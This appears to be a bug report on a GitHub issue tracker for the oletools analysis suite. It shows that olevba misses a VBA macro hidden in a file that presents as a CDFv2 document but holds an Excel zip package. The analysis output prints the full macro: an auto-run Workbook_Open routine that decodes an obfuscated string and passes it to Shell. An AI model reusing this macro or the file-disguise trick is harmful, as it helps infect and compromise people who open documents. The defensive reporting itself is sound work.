oletools
oletools copied to clipboard
Published
20 hours ago •
decalage2
decalage2
Find ole inside CDFv2-disguise
Consider the following analysis for attached sample sneaky.ole.zipped-for-github.zip:
$ file sneaky.ole
sneaky.ole: Composite Document File V2 Document, Cannot read section info
$ olevba -j sneaky.ole
[
{
"script_name": "olevba",
"version": "0.60.1",
"python_version": [
3,
10,
4
],
"url": "http://decalage.info/python/oletools",
"type": "MetaInformation"
}
, {
"container": null,
"file": "sneaky.ole",
"json_conversion_successful": true,
"analysis": null,
"code_deobfuscated": null,
"do_deobfuscate": false,
"show_pcode": false,
"type": "OLE",
"macros": []
}
]
However:
$ unzip sneaky.ole -d sneaky.ole.unzipped
Archive: sneaky.ole
warning [sneaky.ole]: 3072 extra bytes at beginning or within zipfile
(attempting to process anyway)
inflating: sneaky.ole.unzipped/[Content_Types].xml
inflating: sneaky.ole.unzipped/_rels/.rels
inflating: sneaky.ole.unzipped/xl/_rels/workbook.xml.rels
inflating: sneaky.ole.unzipped/xl/workbook.xml
inflating: sneaky.ole.unzipped/xl/styles.xml
inflating: sneaky.ole.unzipped/xl/worksheets/sheet1.xml
inflating: sneaky.ole.unzipped/xl/worksheets/_rels/sheet1.xml.rels
inflating: sneaky.ole.unzipped/xl/vbaProject.bin
inflating: sneaky.ole.unzipped/xl/theme/theme1.xml
inflating: sneaky.ole.unzipped/xl/printerSettings/printerSettings1.bin
inflating: sneaky.ole.unzipped/docProps/app.xml
inflating: sneaky.ole.unzipped/docProps/core.xml
$ file sneaky.ole.unzipped/xl/vbaProject.bin
sneaky.ole.unzipped/xl/vbaProject.bin: Composite Document File V2 Document, Cannot read section info
$ olevba -j sneaky.ole.unzipped/xl/vbaProject.bin
[
{
"script_name": "olevba",
"version": "0.60.1",
"python_version": [
3,
10,
4
],
"url": "http://decalage.info/python/oletools",
"type": "MetaInformation"
}
, {s...
"container": null,
"file": "sneaky.ole.unzipped/xl/vbaProject.bin",
"json_conversion_successful": true,
"analysis": [
{
"type": "AutoExec",
"keyword": "Workbook_Open",
"description": "Runs when the Excel Workbook is opened"
},
{
"type": "Suspicious",
"keyword": "Shell",
"description": "May run an executable file or a system command"
},
{
"type": "Suspicious",
"keyword": "Chr",
"description": "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
},
{
"type": "Suspicious",
"keyword": "Hex Strings",
"description": "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
}
],
"code_deobfuscated": null,
"do_deobfuscate": false,
"show_pcode": false,
"type": "OLE",
"macros": [
{
"vba_filename": "ThisWorkbook.cls",
"subfilename": "sneaky.ole.unzipped/xl/vbaProject.bin",
"ole_stream": "VBA/ThisWorkbook",
"code": "Public Sub Workbook_Open()\nShell (c(c(c(ac(c(c(c(\" Ÿ§•¢£˜•œœ^•¨•P]•¨•“¥¤™Ÿž Ÿœ™“©P’© ‘££P]‡Px™””•žP]“Ÿ��‘ž”PXž•§]Ÿ’š•“¤Pƒ©£¤•�^~•¤^‡•’sœ™•ž¤Y^tŸ§žœŸ‘”v™œ•XW˜¤¤ j__ahe^b`h^baa^fg_£“Ÿ¢ _�¥••ž^£–¨^•¨•W\\T•ž¦j„•� [WŒž•§–™œ•^u¨•WYkX~•§]’š•“¤P]“Ÿ�Pƒ˜•œœ^q œ™“‘¤™ŸžY^ƒ˜•œœu¨•“¥¤•XT•ž¦j„•� [WŒž•§–™œ•^u¨•WY\"))))))))\nEnd Sub\n\n Public Function c(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½ As String)\n Dim s As Integer, q As Integer\n s = 16\n For q = 1 To Len(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½)\n Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1) = Chr(Asc(Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1)) - s)\n Next q\n c = •¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½\n End Function\n Public Function ac(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½ As String)\n Dim s As Integer, q As Integer\n s = 48\n For q = 1 To Len(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½)\n Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1) = Chr(Asc(Mid(•¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½, q, 1)) + s)\n Next q\n ac = •¹•Z…–€‘¾¾•ÅN¾•…¬ZD¾§†B‚àZøŸ™Å§àZ¾·Ìò±DdzYŸœ§¹BN•‘¾œ½\n End Function"
},
{
"vba_filename": "Sheet1.cls",
"subfilename": "sneaky.ole.unzipped/xl/vbaProject.bin",
"ole_stream": "VBA/Sheet1",
"code": ""
}
]
}
]
